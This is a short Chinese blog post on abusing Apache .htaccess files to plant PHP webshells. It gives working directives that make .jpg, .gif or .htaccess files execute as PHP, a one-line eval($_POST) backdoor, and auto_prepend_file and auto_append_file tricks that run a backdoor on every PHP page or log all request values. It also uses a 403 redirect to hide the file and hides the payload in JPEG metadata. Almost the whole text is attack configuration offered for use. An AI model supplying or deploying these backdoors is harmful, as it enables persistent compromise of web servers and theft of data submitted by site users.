这几天看了下htaccess的一些东东。首先环境要支持.htaccess,apache啥的。
php的.htaccess
第一种,添加扩展
AddType application/x-httpd-php .jpg
把shell扩展名修改为jpg,上传,执行
总结:解析jpg,脚本放扩展名为jpg的文本中
第二种,允许远程匿名访问.ht文件,之后XX
<Files ~ “^\.ht”>
order allow,deny
Allow from all
</Files>
#首先允许web访问这个文件
RedirectMatch 403 .htaccess$
#.htaccess结尾的403错误,这里是为了增加隐蔽性
AddType application/x-httpd-php .htaccess
#给.htaccess映射php拓展
<?php @eval($_POST[‘chopper’]);?>
#恶意的php代码
总结:解析.ht,脚本放.htaccess中
第三种,SetHandler
//可将php代码存于非php后缀文件,例: x.jpg
//将以下代码写入.htaccess中
//连接x.jpg即可启动后门木马
<FilesMatch “x.jpg”>
SetHandler application/x-httpd-php
</FilesMatch>
总结:filesmatch解析某jpg后缀
第四种,auto_prepend_file
//可将php代码存于非php后缀文件,例: 123.gif
//将以下代码写入.htaccess中, 文件路径必须是绝对路径
//访问网站上任何php文件都会启动该php后门木马
//可在不更改站点源代码的情况下记录所有$_REQUEST的值,也可批量挂马
php_value auto_prepend_file c:/apache2/htdocs/123.gif
总结:解析所有gif为php
第四种,auto_append_file
//类似auto_prepend_file
//可将php代码存于非php后缀文件,例: 123.gif
//将以下代码写入.htaccess中, 文件路径必须是绝对路径
//访问网站上任何php文件都会启动该php后门木马
php_value auto_append_file c:/apache2/htdocs/123.gif
总结:解析所有gif为php。
一句话脚本2种隐藏办法
第一种,jhead,修改jpeg文件的metadata内容来隐藏脚本,之后增加jpg的解析为php,之后就可以执行命令了。
第二种,把一句话藏edjpgcom中,把一句话当做注释藏于图片中,之后jpg解析为php,或者包含,或者直接修改后缀。
其它还有cmd合并啊,流文件啊,so on。
转载请注明:jinglingshu的博客 » php htaccess 的那些事